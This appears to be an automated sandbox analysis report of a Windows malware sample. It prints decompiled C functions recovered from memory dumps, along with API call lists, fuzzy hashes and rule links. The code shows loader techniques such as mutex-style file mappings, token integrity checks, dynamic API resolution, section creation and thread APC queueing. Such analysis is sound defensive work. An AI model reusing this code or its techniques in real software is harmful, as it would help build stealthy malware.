                                                          Function 005E232F, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 74%
                                                          			E005E232F(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L005EAF28();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x5ed2a8; // 0x107a5a8
				_t5 = _t13 + 0x5ee87e; // 0x1668e26
				_t6 = _t13 + 0x5ee59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L005EABCA();
				_t17 = CreateFileMappingW(0xffffffff, 0x5ed2ac, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                                          0x005e232f
                                                          0x005e2337
                                                          0x005e233b
                                                          0x005e2341
                                                          0x005e2346
                                                          0x005e234b
                                                          0x005e234e
                                                          0x005e2351
                                                          0x005e2356
                                                          0x005e2357
                                                          0x005e235a
                                                          0x005e235f
                                                          0x005e2366
                                                          0x005e2370
                                                          0x005e2372
                                                          0x005e2373
                                                          0x005e2376
                                                          0x005e2392
                                                          0x005e2398
                                                          0x005e239c
                                                          0x005e23ea
                                                          0x005e239e
                                                          0x005e23ab
                                                          0x005e23bb
                                                          0x005e23c3
                                                          0x005e23d5
                                                          0x005e23d9
                                                          0x00000000
                                                          0x00000000
                                                          0x005e23c5
                                                          0x005e23c8
                                                          0x005e23cd
                                                          0x005e23cf
                                                          0x005e23cf
                                                          0x005e23ad
                                                          0x005e23af
                                                          0x005e23db
                                                          0x005e23dc
                                                          0x005e23dc
                                                          0x005e23ab
                                                          0x005e23f1

                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,005E5C31,?,?,4D283A53,?,?), ref: 005E233B
                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 005E2351
                                                          • _snwprintf.NTDLL ref: 005E2376
                                                          • CreateFileMappingW.KERNELBASE(000000FF,005ED2AC,00000004,00000000,00001000,?), ref: 005E2392
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,005E5C31,?,?,4D283A53), ref: 005E23A4
                                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 005E23BB
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,005E5C31,?,?), ref: 005E23DC
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,005E5C31,?,?,4D283A53), ref: 005E23E4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                          • String ID:
                                                          • API String ID: 1814172918-0
                                                          • Opcode ID: 2437ad210062c0c28778dba2fe4cb175f766732a60ea3c4f6b0ee8619141f16f
                                                          • Instruction ID: de95a8885a64527a6e5de91d66442978d71e0e5eef8475525f7554deba8daa8b
                                                          • Opcode Fuzzy Hash: 2437ad210062c0c28778dba2fe4cb175f766732a60ea3c4f6b0ee8619141f16f
                                                          • Instruction Fuzzy Hash: E721F372600284FBC728AB65CC89F9E3FADBB98700F200521F685EA190D670E9099B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E5BA2, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 159memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 57%
                                                          			E005E5BA2(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E005E6C09();
				if(_t21 != 0) {
					_t59 =  *0x5ed25c; // 0x2000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x5ed25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x5ed160(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E005E496B( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x5ed2a8; // 0x107a5a8
					if( *0x5ed25c > 5) {
						_t8 = _t26 + 0x5ee5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x5ee9f5; // 0x44283a44
						_t27 = _t7;
					}
					E005E729A(_t27, _t27);
					_t31 = E005E232F(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x5ed270 =  *0x5ed270 ^ 0x81bbe65d;
						_t32 = E005EA71F(0x60);
						 *0x5ed32c = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x5ed32c; // 0x16695b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x5ed32c; // 0x16695b0
							 *_t51 = 0x5ee81a;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x5ed238, 0, 0x43);
							 *0x5ed2c8 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x5ed25c; // 0x2000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x5ed2a8; // 0x107a5a8
								_t13 = _t58 + 0x5ee55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x5ec287);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E005E9135( ~_v8 &  *0x5ed270,  &E005ED00C); // executed
								_t42 = E005E888E(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E005E87AE(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E005E51B0(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E005E1C66(__eflags,  &(_t65[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x5ed15c();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E005EA273(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}































                                                          0x005e5ba2
                                                          0x005e5bad
                                                          0x005e5bb0
                                                          0x005e5bb3
                                                          0x005e5bb6
                                                          0x005e5bbd
                                                          0x005e5bbf
                                                          0x005e5bcb
                                                          0x005e5bcd
                                                          0x005e5bcd
                                                          0x005e5bd6
                                                          0x005e5bdc
                                                          0x005e5be1
                                                          0x005e5bfb
                                                          0x005e5c07
                                                          0x005e5c09
                                                          0x005e5c0e
                                                          0x005e5c18
                                                          0x005e5c18
                                                          0x005e5c10
                                                          0x005e5c10
                                                          0x005e5c10
                                                          0x005e5c10
                                                          0x005e5c1f
                                                          0x005e5c2c
                                                          0x005e5c33
                                                          0x005e5c38
                                                          0x005e5c38
                                                          0x005e5c40
                                                          0x005e5c43
                                                          0x005e5c69
                                                          0x005e5c75
                                                          0x005e5c7a
                                                          0x005e5c7f
                                                          0x005e5c81
                                                          0x005e5cad
                                                          0x005e5caf
                                                          0x005e5c83
                                                          0x005e5c87
                                                          0x005e5c8c
                                                          0x005e5c91
                                                          0x005e5c98
                                                          0x005e5c9e
                                                          0x005e5ca3
                                                          0x005e5ca9
                                                          0x005e5cb0
                                                          0x005e5cb2
                                                          0x005e5cb4
                                                          0x005e5cc3
                                                          0x005e5cc9
                                                          0x005e5cce
                                                          0x005e5cd0
                                                          0x005e5d00
                                                          0x005e5d02
                                                          0x005e5cd2
                                                          0x005e5cd2
                                                          0x005e5cd8
                                                          0x005e5ce5
                                                          0x005e5ceb
                                                          0x005e5ceb
                                                          0x005e5cf3
                                                          0x005e5cfc
                                                          0x005e5d03
                                                          0x005e5d05
                                                          0x005e5d07
                                                          0x005e5d0e
                                                          0x005e5d1b
                                                          0x005e5d20
                                                          0x005e5d25
                                                          0x005e5d27
                                                          0x005e5d29
                                                          0x00000000
                                                          0x00000000
                                                          0x005e5d2b
                                                          0x005e5d30
                                                          0x005e5d32
                                                          0x005e5d39
                                                          0x005e5d3d
                                                          0x005e5d40
                                                          0x005e5d55
                                                          0x005e5d59
                                                          0x005e5d5e
                                                          0x00000000
                                                          0x005e5d5e
                                                          0x005e5d42
                                                          0x005e5d44
                                                          0x00000000
                                                          0x00000000
                                                          0x005e5d4f
                                                          0x005e5d51
                                                          0x005e5d53
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x005e5d53
                                                          0x005e5d36
                                                          0x005e5d36
                                                          0x005e5d07
                                                          0x005e5c45
                                                          0x005e5c45
                                                          0x005e5c4a
                                                          0x005e5d60
                                                          0x005e5d64
                                                          0x005e5d6c
                                                          0x005e5d6c
                                                          0x00000000
                                                          0x005e5d64
                                                          0x005e5c50
                                                          0x005e5c53
                                                          0x005e5c5d
                                                          0x005e5c64
                                                          0x00000000
                                                          0x005e5d74
                                                          0x005e5d74
                                                          0x005e5d78
                                                          0x005e5d7c
                                                          0x005e5d7c

                                                          APIs
                                                            • Part of subcall function 005E6C09: GetModuleHandleA.KERNEL32(4C44544E,00000000,005E5BBB,00000000,00000000), ref: 005E6C18
                                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 005E5C38
                                                            • Part of subcall function 005EA71F: RtlAllocateHeap.NTDLL(00000000,00000000,005E5595), ref: 005EA72B
                                                          • memset.NTDLL ref: 005E5C87
                                                          • RtlInitializeCriticalSection.NTDLL(01669570), ref: 005E5C98
                                                            • Part of subcall function 005E1C66: memset.NTDLL ref: 005E1C7B
                                                            • Part of subcall function 005E1C66: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 005E1CBD
                                                            • Part of subcall function 005E1C66: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 005E1CC8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 005E5CC3
                                                          • wsprintfA.USER32 ref: 005E5CF3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                          • String ID: i+
                                                          • API String ID: 4246211962-4239572274
                                                          • Opcode ID: e9eb1c5aa65d7286ba3fa95a69b232cc1c327c030584564ce2e92266c7a54891
                                                          • Instruction ID: 11624f4f65273cbe3d72675a9ac41bb5c8e320ebeca41a16a0874d40e0a68ea9
                                                          • Opcode Fuzzy Hash: e9eb1c5aa65d7286ba3fa95a69b232cc1c327c030584564ce2e92266c7a54891
                                                          • Instruction Fuzzy Hash: BF514871A00B98ABCB2D9BA2CC8DB5E7FB8BB14704F144815F2C1DB151F6708E09DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E1A08, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E005E1A08(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x5ed25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E005EA71F(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E005EA734(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                                          0x005e1a15
                                                          0x005e1a1c
                                                          0x005e1a23
                                                          0x005e1a37
                                                          0x005e1a42
                                                          0x005e1a5a
                                                          0x005e1a67
                                                          0x005e1a6a
                                                          0x005e1a6f
                                                          0x005e1a7a
                                                          0x005e1a7e
                                                          0x005e1a8d
                                                          0x005e1a91
                                                          0x005e1aad
                                                          0x005e1aad
                                                          0x005e1ab1
                                                          0x005e1ab1
                                                          0x005e1ab6
                                                          0x005e1aba
                                                          0x005e1ac0
                                                          0x005e1ac1
                                                          0x005e1ac8
                                                          0x005e1ace

                                                          APIs
                                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 005E1A3A
                                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 005E1A5A
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 005E1A6A
                                                          • CloseHandle.KERNEL32(00000000), ref: 005E1ABA
                                                            • Part of subcall function 005EA71F: RtlAllocateHeap.NTDLL(00000000,00000000,005E5595), ref: 005EA72B
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 005E1A8D
                                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 005E1A95
                                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 005E1AA5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                          • String ID:
                                                          • API String ID: 1295030180-0
                                                          • Opcode ID: 43981d19976cd1911d6206e18d917e819718dde20bb411a7bf7eb6262476b1d6
                                                          • Instruction ID: e50923e21282b0859b94ab1005090c970388933cc95897e695d8ca34ef150b04
                                                          • Opcode Fuzzy Hash: 43981d19976cd1911d6206e18d917e819718dde20bb411a7bf7eb6262476b1d6
                                                          • Instruction Fuzzy Hash: F1215C75900289FFEB04DFA1DC88EAEBFBAFB44300F040065E950A61A0D7719E45EB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E391F, Relevance: 9.2, APIs: 6, Instructions: 154memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysAllocString.OLEAUT32(?), ref: 005E395A
                                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 005E39DD
                                                          • StrStrIW.SHLWAPI(00000000,006E0069), ref: 005E3A1D
                                                          • SysFreeString.OLEAUT32(00000000), ref: 005E3A3F
                                                            • Part of subcall function 005E6F3A: SysAllocString.OLEAUT32(005EC290), ref: 005E6F8A
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 005E3A92
                                                          • SysFreeString.OLEAUT32(00000000), ref: 005E3AA1
                                                            • Part of subcall function 005E1AE2: Sleep.KERNELBASE(000001F4), ref: 005E1B2A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                                          • String ID:
                                                          • API String ID: 2118684380-0
                                                          • Opcode ID: 9f8953d2e204d7a83f1980cc4cff75c28e292e4144cd8f6080ad50f3a4909e2b
                                                          • Instruction ID: 79a3653c768b5444cef1281662d3f6a8d86392c1df9a15c9a534750167574d00
                                                          • Opcode Fuzzy Hash: 9f8953d2e204d7a83f1980cc4cff75c28e292e4144cd8f6080ad50f3a4909e2b
                                                          • Instruction Fuzzy Hash: 2B516176500649EFDB05CFA9C888AAEBBB6FF88740B144469E585DB220DB31DE45CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 10001146, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E10001146(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E10002009(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x10004144 + 0x10005014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x10004144 + 0x10005151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E1000201E(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x10004144 + 0x10005161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x10004144 + 0x10005174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x10004144 + 0x10005189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x10004144 + 0x1000519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E10001996(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}












                                                          0x10001154
                                                          0x10001158
                                                          0x10001219
                                                          0x1000115e
                                                          0x10001176
                                                          0x10001185
                                                          0x1000118c
                                                          0x1000118e
                                                          0x10001193
                                                          0x10001211
                                                          0x10001212
                                                          0x10001195
                                                          0x100011a2
                                                          0x100011a4
                                                          0x100011a9
                                                          0x00000000
                                                          0x100011ab
                                                          0x100011b8
                                                          0x100011ba
                                                          0x100011bf
                                                          0x00000000
                                                          0x100011c1
                                                          0x100011ce
                                                          0x100011d0
                                                          0x100011d5
                                                          0x00000000
                                                          0x100011d7
                                                          0x100011e4
                                                          0x100011e6
                                                          0x100011eb
                                                          0x00000000
                                                          0x100011ed
                                                          0x100011f3
                                                          0x100011f9
                                                          0x100011fe
                                                          0x10001203
                                                          0x10001208
                                                          0x00000000
                                                          0x1000120a
                                                          0x1000120d
                                                          0x1000120d
                                                          0x10001208
                                                          0x100011eb
                                                          0x100011d5
                                                          0x100011bf
                                                          0x100011a9
                                                          0x10001193
                                                          0x10001227

                                                          APIs
                                                            • Part of subcall function 10002009: HeapAlloc.KERNEL32(00000000,?,10001FA5,00000208,00000000,00000000,?,?,?,100014C0,?), ref: 10002015
                                                          • GetModuleHandleA.KERNEL32(?,00000020), ref: 1000116A
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 1000118C
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 100011A2
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 100011B8
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 100011CE
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 100011E4
                                                            • Part of subcall function 10001996: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000), ref: 100019F3
                                                            • Part of subcall function 10001996: memset.NTDLL ref: 10001A15
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.490150047.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.490223790.0000000010005000.00000040.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                          • String ID:
                                                          • API String ID: 1632424568-0
                                                          • Opcode ID: 17d813e253e26c7d917519e6547015275f2db354573dbeff9a142f8077207000
                                                          • Instruction ID: cc8e7b0cdea4028d8609f0a74ea6faac012f454d02bbe199c50159465f61c836
                                                          • Opcode Fuzzy Hash: 17d813e253e26c7d917519e6547015275f2db354573dbeff9a142f8077207000
                                                          • Instruction Fuzzy Hash: EA2107B160071AAFEB11DFB9CD80E9BB7ECEF643C17024466E945D7219EB70E9108B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 10001D4B, Relevance: 9.1, APIs: 6, Instructions: 71memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 86%
                                                          			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x10004108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x1000410c;
						if( *0x1000410c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x10004118;
								if( *0x10004118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x1000410c);
						}
						HeapDestroy( *0x10004110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x10004108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0x10004110 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x10004130 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E1000155C(E100015EA, E10001A86(_a12, 1, 0x10004118, _t41));
							 *0x1000410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}












                                                          0x10001d4e
                                                          0x10001d5a
                                                          0x10001d5c
                                                          0x10001d5f
                                                          0x10001dd5
                                                          0x10001ddb
                                                          0x10001ddd
                                                          0x10001ddf
                                                          0x10001de5
                                                          0x10001de7
                                                          0x10001dec
                                                          0x10001def
                                                          0x10001dfa
                                                          0x10001dfc
                                                          0x00000000
                                                          0x00000000
                                                          0x10001dfe
                                                          0x10001e01
                                                          0x10001e03
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x10001e03
                                                          0x10001e0b
                                                          0x10001e0b
                                                          0x10001e17
                                                          0x10001e17
                                                          0x10001d61
                                                          0x10001d62
                                                          0x10001d82
                                                          0x10001d88
                                                          0x10001d8d
                                                          0x10001d8f
                                                          0x10001dcb
                                                          0x10001dcb
                                                          0x10001d91
                                                          0x10001d99
                                                          0x10001da0
                                                          0x10001daa
                                                          0x10001db6
                                                          0x10001dbb
                                                          0x10001dc2
                                                          0x10001dc7
                                                          0x00000000
                                                          0x10001dc7
                                                          0x10001dc2
                                                          0x10001d8f
                                                          0x10001d62
                                                          0x10001e24

                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(10004108), ref: 10001D6D
                                                          • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 10001D82
                                                            • Part of subcall function 1000155C: CreateThread.KERNEL32 ref: 10001573
                                                            • Part of subcall function 1000155C: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 10001588
                                                            • Part of subcall function 1000155C: GetLastError.KERNEL32(00000000), ref: 10001593
                                                            • Part of subcall function 1000155C: TerminateThread.KERNEL32(00000000,00000000), ref: 1000159D
                                                            • Part of subcall function 1000155C: CloseHandle.KERNEL32(00000000), ref: 100015A4
                                                            • Part of subcall function 1000155C: SetLastError.KERNEL32(00000000), ref: 100015AD
                                                          • InterlockedDecrement.KERNEL32(10004108), ref: 10001DD5
                                                          • SleepEx.KERNEL32(00000064,00000001), ref: 10001DEF
                                                          • CloseHandle.KERNEL32 ref: 10001E0B
                                                          • HeapDestroy.KERNEL32 ref: 10001E17
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.490150047.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.490223790.0000000010005000.00000040.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                          • String ID:
                                                          • API String ID: 2110400756-0
                                                          • Opcode ID: 40578092a05b622e8806beb96ef45d375467769f53722385fffed7eee2b4cb66
                                                          • Instruction ID: 8abdcd5857cf8f821d83f0baa7898db106f37a39b4e53263aae9e46ce88ae204
                                                          • Opcode Fuzzy Hash: 40578092a05b622e8806beb96ef45d375467769f53722385fffed7eee2b4cb66
                                                          • Instruction Fuzzy Hash: 63215EB1601265AFF701EFA9CCC89CE7BE8FB552E17128529FA05D3168DB748D808F94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E12E5, Relevance: 9.1, APIs: 6, Instructions: 60sleepmemorytimeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 74%
                                                          			E005E12E5(void* __ecx, signed int __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				signed int _t26;
				signed int _t33;

				_t26 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x5ed238 = _t10;
				if(_t10 != 0) {
					 *0x5ed1a8 = GetTickCount();
					_t12 = E005E3E69(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
							_push(0);
							_push(9);
							_push(_t23 >> 7);
							_push(_t16);
							L005EB08A();
							_t33 = _t14 + _t16;
							_t18 = E005E5548(_a4, _t33);
							_t19 = 2;
							_t25 = _t33;
							Sleep(_t19 << _t33); // executed
						} while (_t18 == 1);
						if(E005E4DA2(_t25) != 0) {
							 *0x5ed260 = 1; // executed
						}
						_t12 = E005E5BA2(_t26); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}













                                                          0x005e12e5
                                                          0x005e12eb
                                                          0x005e12ec
                                                          0x005e12f8
                                                          0x005e12fe
                                                          0x005e1305
                                                          0x005e1315
